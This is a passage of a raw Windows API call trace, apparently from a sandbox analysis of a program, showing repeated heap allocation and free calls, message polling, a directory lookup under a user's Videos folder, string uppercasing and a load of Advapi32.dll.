lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0214.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0214.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0214.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0214.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0214.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0214.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.050] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SpSJ7tN62PCD2h Y", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdff5f6d0, ftCreationTime.dwHighDateTime=0x1d5c7be, ftLastAccessTime.dwLowDateTime=0xa0e93160, ftLastAccessTime.dwHighDateTime=0x1d5d19f, ftLastWriteTime.dwLowDateTime=0xa0e93160, ftLastWriteTime.dwHighDateTime=0x1d5d19f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpSJ7tN62PCD2h Y", cAlternateFileName="SPSJ7T~1")) returned 0x9e1cf8 [0214.050] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0214.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0214.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.052] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.052] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.053] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.053] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.054] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.054] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.055] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 